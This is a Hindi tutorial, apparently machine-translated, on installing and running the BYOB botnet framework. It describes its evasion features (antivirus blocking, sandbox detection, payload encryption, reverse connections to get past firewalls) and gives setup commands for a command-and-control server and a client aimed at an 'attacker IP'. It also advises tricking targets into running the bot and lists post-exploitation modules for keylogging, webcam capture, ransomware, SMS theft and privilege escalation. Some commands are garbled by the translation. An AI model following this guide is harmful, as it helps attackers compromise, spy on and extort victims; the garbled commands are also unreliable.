अपना खुद का बॉटनेट बनाएं

BYOB सुरक्षा शोधकर्ताओं और डेवलपर्स के लिए एक बुनियादी बॉटनेट बनाने और संचालित करने के लिए एक ढांचा प्रदान करता है ताकि परिष्कृत मैलवेयर की उनकी समझ को गहरा किया जा सके जो हर साल लाखों उपकरणों को संक्रमित करता है और इन खतरों के खिलाफ काउंटर-उपायों को विकसित करने की उनकी क्षमता में सुधार करने के लिए आधुनिक बॉटनेट को जन्म देता है। यह डेवलपर्स को आसानी से अपने कोड को लागू करने और आरएटी या कमांड एंड कंट्रोल सर्वर को खरोंच से लिखने के बिना शानदार नई सुविधाओं को जोड़ने की अनुमति देने के लिए डिज़ाइन किया गया है।

सुविधाएं

• डिस्क पर कुछ भी नहीं लिखा - क्लाइंट कभी भी डिस्क पर कुछ भी नहीं लिखते हैं - अस्थायी फ़ाइलें भी नहीं क्योंकि दूरस्थ आयात मनमाने कोड को गतिशील रूप से मेमोरी में लोड करने और वर्तमान में चल रही प्रक्रिया में सीधे आयात करने की अनुमति देता है।

• प्लेटफ़ॉर्म स्वतंत्र - सब कुछ पायथन में लिखा गया है और उत्पन्न क्लाइंट को वैकल्पिक रूप से एक पोर्टेबल निष्पादन योग्य (विंडोज) में संकलित किया जा सकता है या एक स्टैंडअलोन एप्लिकेशन में बंडल किया जा सकता है।

• फ़ायरवॉल को बायपास करें - क्लाइंट रिवर्स टीसीपी कनेक्शन के माध्यम से कमांड और कंट्रोल सर्वर से जुड़ते हैं, जो अधिकांश फायरवॉल को बायपास कर देगा क्योंकि डिफ़ॉल्ट फिल्टर कॉन्फ़िगरेशन मुख्य रूप से आने वाले कनेक्शन को ब्लॉक करते हैं।

• एंटीवायरस के खिलाफ प्रति-उपाय - ज्ञात एंटीवायरस उत्पादों के नाम वाली प्रक्रियाओं को स्पॉनिंग से अवरुद्ध करके एंटीवायरस द्वारा विश्लेषण किए जाने से बचा जाता है।

• विश्लेषण को रोकने के लिए पेलोड एन्क्रिप्ट करें - मुख्य क्लाइंट पेलोड एक यादृच्छिक 256-बिट कुंजी के साथ एन्क्रिप्ट किया गया है जो पूरी तरह से पेलोड स्टेजर में मौजूद है जो इसके साथ उत्पन्न होता है।

• रिवर्स-इंजीनियरिंग को रोकें - डिफ़ॉल्ट रूप से, यदि वर्चुअल मशीन या सैंडबॉक्स का पता चलता है, तो क्लाइंट निष्पादन को रोक देगा।

कैसे स्थापित करें

• गिट क्लोन https://github.com/malwaredllc/byob.git

• सीडी बायोब

• पाइप इंस्टाल -r आवश्यकताएँ.txt

• अजगर setup.py

  यहां दो टर्मिनलों का उपयोग किया जाएगा; पहला टर्मिनल बीओटी सर्वर होगा जहां सत्रों को संभाला जाएगा और दूसरा टर्मिनल बीओटी क्लाइंट होगा जहां बॉट बनाए जाएंगे।

• अजगर सर्वर.py -पोर्ट 445

  फिर एक और लिनक्स टर्मिनल खोलें और टाइप करें cd /home/cybersecurity/Downloads/byob/byob

• python client.py -name testbot.py 192.168.1.10(हमलावर आईपी) 445

उपरोक्त क्वेरी को निष्पादित करने के बाद, एक नया बॉटनेट बनाया जाएगा। उपरोक्त क्वेरी निष्पादित होगी। अब, आप अपने कंप्यूटर में बॉट खोलने के लिए किसी भी सोशल इंजीनियरिंग ट्रिक का उपयोग कर सकते हैं। जब testbot.py को लक्ष्य मशीन में निष्पादित किया जाता है, तो बॉटनेट सर्वर में एक सत्र बनाया जाएगा।

शोषण के बाद

पोस्ट-शोषण मॉड्यूल जो पीड़ितों में बॉटनेट के सफल कॉन्फ़िगरेशन के बाद ग्राहकों द्वारा दूरस्थ रूप से आयात किए जा सकते हैं।

• Keylogger (byob.modules.keylogger):उपयोगकर्ता के कीस्ट्रोक्स और दर्ज किए गए विंडो नाम को लॉग करता है

• स्क्रीनशॉट (byob.modules.screenshot):वर्तमान उपयोगकर्ता के डेस्कटॉप का स्क्रीनशॉट लें

• वेब कैमरा (byob.modules.webcam):लाइव स्ट्रीम देखें या वेबकैम से छवि/वीडियो कैप्चर करें

• फिरौती (byob.modules.ransom):फाइलों को एन्क्रिप्ट करें और फिरौती के भुगतान के लिए यादृच्छिक बीटीसी वॉलेट बनाएं

• पैकेट स्निफ़र (byob.modules.packetsniffer):होस्ट नेटवर्क पर पैकेट स्निफ़र चलाएँ और अपलोड करें.pcap फ़ाइल

• हठ (byob.modules.persistence):मेजबान मशीन पर दृढ़ता स्थापित करें

• फोन (byob.modules.phone):क्लाइंट स्मार्टफोन से टेक्स्ट मैसेज पढ़ें/खोज/अपलोड करें

• विशेषाधिकार बढ़ाना (byob.modules.escalate):अनधिकृत प्रशासक विशेषाधिकार प्राप्त करने के लिए UAC बाईपास का प्रयास करें

• पोर्ट स्कैनर (byob.modules.portscanner):अन्य ऑनलाइन उपकरणों के लिए स्थानीय नेटवर्क को स्कैन करें और पोर्ट खोलें

• प्रक्रिया नियंत्रण (byob.modules.process):सूची/खोज/मार/मॉनिटर वर्तमान में होस्ट पर चल रही प्रक्रियाओं की निगरानी करें